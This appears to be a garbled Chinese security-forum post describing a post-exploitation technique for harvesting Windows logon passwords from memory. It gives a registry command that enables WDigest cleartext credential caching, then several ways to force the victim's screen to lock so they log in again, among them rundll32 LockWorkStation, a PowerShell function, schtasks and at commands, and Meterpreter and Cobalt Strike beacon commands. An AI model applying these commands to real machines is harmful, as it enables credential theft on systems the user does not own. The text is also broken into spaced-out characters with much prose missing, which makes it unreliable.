[27281] 2021-06-30_抓取内存口令一个小技巧

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-06-30_抓取内存口令一个小技巧     M s 0 8 0 6 7   2 0 2 1 - 0 6 - 3 0 #   , 8 #   , 8 M s 0 8 0 6 7 M S 0 8 0 6 7       M s 0 8 0 6 7 1 . K B 2 8 7 1 9 9 7 W i n 7 0 8 W d i g e s t S e r v e r 2 0 1 2 线 C M D P o w e r S h e l l r e g   a d d   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t   / v U s e L o g o n C r e d e n t i a l   / t   R E G _ D W O R D   / d   1   / f r u n d l l 3 2 . e x e   u s e r 3 2 . d l l , L o c k W o r k S t a t i o n
2 . w m i c w i n r m p s e x e c M S F   M e t e r p r e t e r C o b a l t   S t r i k e   b e a c o n M S F C S 2 . 1   1 .   使   s c h t a s k s     / R U   2 .   A t   i n t e r a c t i v e   w i n 7 使 S Y S T E M   2 . 2 M S F 1 .   m e t e r p r e t e r s h e l l   r u n d l l 3 2 . e x e u s e r 3 2 . d l l , L o c k W o r k S t a t i o n   2 .   使   e x e c u t e   3 .   p o w e r s h e l l p o w e r s h e l l p o w e r s h e l l M S F   p o w e r s h e l l _ i m p o r t   使 p o w e r s h e l l _ e x e c u t e   F u n c t i o n   L o c k - W o r k S t a t i o n   { $ s i g n a t u r e   =   @ " [ D l l I m p o r t ( " u s e r 3 2 . d l l " ,   S e t L a s t E r r o r   =   t r u e ) ] p u b l i c   s t a t i c   e x t e r n   b o o l   L o c k W o r k S t a t i o n ( ) ; " @ $ L o c k W o r k S t a t i o n   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ s i g n a t u r e   - n a m e " W i n 3 2 L o c k W o r k S t a t i o n "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s   - p a s s t h r u $ L o c k W o r k S t a t i o n : : L o c k W o r k S t a t i o n ( )   |   O u t - N u l l } s c h t a s k s   / c r e a t e   / t n   " l o c k "   / t r   " r u n d l l 3 2 . e x e   u s e r 3 2 . d l l ,   L o c k W o r k S t a t i o n "   / s c o n c e   / s t   1 9 : 2 4   / S   t a r g e t   / R U   a d m i n i s t r a t o r   / u   a d m i n i s t r a t o r   / p   " p a s s w o r d " a t   d c 1 6   1 2 : 0 0   / i n t e r a c t i v e   c : w i n d o w s s y s t e m 3 2 r u n d l l 3 2 . e x e   " u s e r 3 2 . d l l , L o c k W o r k S t a t i o n " :   使   s c h t a s k s . e x e   ( 使   " s c h t a s k s   / ? "   ) m e t e r p r e t e r   >   e x e c u t e   - f   r u n d l l 3 2 . e x e   - a   " u s e r 3 2 . d l l , L o c k W o r k S t a t i o n " m e t e r p r e t e r   >   l o a d   p o w e r s h e l l m e t e r p r e t e r   >   p o w e r s h e l l _ i m p o r t   / h o m e / k a l i / D e s k t o p / l o c k . p s 1
4 .   使   m i g r a t e   2 . 3   C o b a l t   S t r i k e 1 .   b e a c o n 使   r u n     e x e c u t e   2 .   p o w e r s h e l l 3 .   使   i n j e c t   B e a c o n 2 . 4   1 .   a t w m i c w i n r m P s E x e c W i n s t a 0 M S F C S W i n s t a 0 2 .   C S   r u n u   使 P I D P I D 使 P I D P a t h :   [ E r r o r   o p e n i n g   p r o c e s s ] m e t e r p r e t e r   >   p o w e r s h e l l _ i m p o r t   / h o m e / k a l i / D e s k t o p / l o c k . p s 1 m e t e r p r e t e r   >   p o w e r s h e l l _ e x e c u t e   L o c k - W o r k S t a t i o n b e a c o n >   r u n   r u n d l l 3 2 . e x e   u s e r 3 2 . d l l , L o c k W o r k S t a t i o n b e a c o n >   e x e c u t e   r u n d l l 3 2 . e x e   u s e r 3 2 . d l l , L o c k W o r k S t a t i o n b e a c o n >   p o w e r s h e l l - i m p o r t   / h o m e / k a l i / D e s k t o p / l o c k . p s 1 b e a c o n >   p o w e r s h e l l   L o c k - W o r k S t a t i o n
4 0 0 0     4 0 0 0 +
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则